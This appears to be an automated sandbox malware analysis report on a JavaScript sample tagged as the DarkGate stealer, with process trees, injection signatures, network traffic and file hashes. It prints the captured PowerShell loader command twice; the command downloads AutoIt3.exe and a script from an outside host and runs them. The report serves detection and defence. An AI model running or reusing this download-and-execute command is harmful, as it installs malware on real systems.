Malware Analysis Report

2024-11-30 11:22

Sample ID 231103-3zj51abc3t
Target 04112023_0757_online-package(0x1010010).js
SHA256 c1c99b9831d48df390c46dc373f8f5691364aa0118cc50484f0efcb2c8cad4df
Tags
darkgate ads5 stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c1c99b9831d48df390c46dc373f8f5691364aa0118cc50484f0efcb2c8cad4df

Threat Level: Known bad

The file 04112023_0757_online-package(0x1010010).js was found to be: Known bad.

Malicious Activity Summary

darkgate ads5 stealer

DarkGate

Suspicious use of NtCreateUserProcessOtherParentProcess

Downloads MZ/PE file

Blocklisted process makes network request

Checks computer location settings

Executes dropped EXE

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-03 23:57

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-03 23:57

Reported

2023-11-03 23:59

Platform

win7-20231023-en

Max time kernel

119s

Max time network

123s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\04112023_0757_online-package(0x1010010).js

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\04112023_0757_online-package(0x1010010).js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443/msiegcubitm' -OutFile 'egcubitm.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'egcubitm.au3'"; Stop-Process -Name "WScript"

Network

N/A

Files

memory/2308-4-0x000000001B170000-0x000000001B452000-memory.dmp

memory/2308-5-0x0000000002410000-0x0000000002418000-memory.dmp

memory/2308-6-0x000007FEF5820000-0x000007FEF61BD000-memory.dmp

memory/2308-7-0x0000000002880000-0x0000000002900000-memory.dmp

memory/2308-8-0x0000000002880000-0x0000000002900000-memory.dmp

memory/2308-9-0x000007FEF5820000-0x000007FEF61BD000-memory.dmp

memory/2308-10-0x0000000002880000-0x0000000002900000-memory.dmp

memory/2308-11-0x000007FEF5820000-0x000007FEF61BD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-11-03 23:57

Reported

2023-11-03 23:59

Platform

win10v2004-20231023-en

Max time kernel

146s

Max time network

152s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\04112023_0757_online-package(0x1010010).js

Signatures

DarkGate

stealer darkgate

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 5104 created 616 N/A C:\tepp\AutoIt3.exe C:\Windows\system32\winlogon.exe

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2231940048-779848787-2990559741-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\tepp\AutoIt3.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5104 set thread context of 880 N/A C:\tepp\AutoIt3.exe C:\Windows\SysWOW64\WerFault.exe

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\tepp\AutoIt3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\tepp\AutoIt3.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2892 wrote to memory of 4492 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2892 wrote to memory of 4492 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4492 wrote to memory of 5104 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\tepp\AutoIt3.exe
PID 4492 wrote to memory of 5104 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\tepp\AutoIt3.exe
PID 4492 wrote to memory of 5104 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\tepp\AutoIt3.exe
PID 5104 wrote to memory of 4484 N/A C:\tepp\AutoIt3.exe C:\Windows\SysWOW64\WerFault.exe
PID 5104 wrote to memory of 4484 N/A C:\tepp\AutoIt3.exe C:\Windows\SysWOW64\WerFault.exe
PID 5104 wrote to memory of 4484 N/A C:\tepp\AutoIt3.exe C:\Windows\SysWOW64\WerFault.exe
PID 5104 wrote to memory of 4484 N/A C:\tepp\AutoIt3.exe C:\Windows\SysWOW64\WerFault.exe
PID 5104 wrote to memory of 1748 N/A C:\tepp\AutoIt3.exe C:\Windows\SysWOW64\WerFault.exe
PID 5104 wrote to memory of 1748 N/A C:\tepp\AutoIt3.exe C:\Windows\SysWOW64\WerFault.exe
PID 5104 wrote to memory of 1748 N/A C:\tepp\AutoIt3.exe C:\Windows\SysWOW64\WerFault.exe
PID 5104 wrote to memory of 880 N/A C:\tepp\AutoIt3.exe C:\Windows\SysWOW64\WerFault.exe
PID 5104 wrote to memory of 880 N/A C:\tepp\AutoIt3.exe C:\Windows\SysWOW64\WerFault.exe
PID 5104 wrote to memory of 880 N/A C:\tepp\AutoIt3.exe C:\Windows\SysWOW64\WerFault.exe
PID 5104 wrote to memory of 880 N/A C:\tepp\AutoIt3.exe C:\Windows\SysWOW64\WerFault.exe
PID 5104 wrote to memory of 880 N/A C:\tepp\AutoIt3.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\04112023_0757_online-package(0x1010010).js

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443/msiegcubitm' -OutFile 'egcubitm.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'egcubitm.au3'"; Stop-Process -Name "WScript"

C:\tepp\AutoIt3.exe

"C:\tepp\AutoIt3.exe" egcubitm.au3

C:\Windows\SysWOW64\WerFault.exe

"C:\Windows\SysWOW64\WerFault.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 sftp.noheroway.com udp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 8.8.8.8:53 224.101.174.185.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 sftp.noheroway.com udp
US 185.174.101.224:8080 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 8.8.8.8:53 67.254.221.88.in-addr.arpa udp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 8.8.8.8:53 2.173.189.20.in-addr.arpa udp
US 185.174.101.224:443 sftp.noheroway.com tcp
US 185.174.101.224:443 sftp.noheroway.com tcp

Files

memory/4492-0-0x0000024B34B10000-0x0000024B34B32000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d1s0vzjy.xqj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4492-10-0x00007FFB40B20000-0x00007FFB415E1000-memory.dmp

memory/4492-11-0x0000024B34B60000-0x0000024B34B70000-memory.dmp

memory/4492-12-0x0000024B34B60000-0x0000024B34B70000-memory.dmp

memory/4492-13-0x0000024B34B60000-0x0000024B34B70000-memory.dmp

C:\tepp\AutoIt3.exe

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

C:\tepp\AutoIt3.exe

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

C:\tepp\egcubitm.au3

MD5 3e44ad030b24484b630393ef879e0732
SHA1 1d6b6bbf4d131ba8112560e2c854a2fc486570be
SHA256 c2c39841c43ee502a8c6dc023cfb847e98a308f0e640d82d81351e41113fbbf2
SHA512 295094cd8ee23c6206eaacc9e056328711d4d43a70bd18499fcca8008269d49aefc2a765ac39ddc630634b7403f00fbd4bb705b58639e4d0806a500715fd1ad4

memory/5104-29-0x0000000000C00000-0x0000000001000000-memory.dmp

memory/5104-30-0x0000000003EE0000-0x000000000420A000-memory.dmp

C:\tepp\AutoIt3.exe

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/4484-37-0x0000000001260000-0x00000000012C6000-memory.dmp

memory/4484-38-0x0000000001260000-0x00000000012C6000-memory.dmp

memory/4492-39-0x00007FFB40B20000-0x00007FFB415E1000-memory.dmp

memory/880-40-0x0000000000400000-0x0000000000465000-memory.dmp

memory/5104-41-0x0000000000C00000-0x0000000001000000-memory.dmp

memory/5104-43-0x0000000003EE0000-0x000000000420A000-memory.dmp

memory/880-42-0x0000000000400000-0x0000000000465000-memory.dmp

memory/880-44-0x0000000000400000-0x0000000000465000-memory.dmp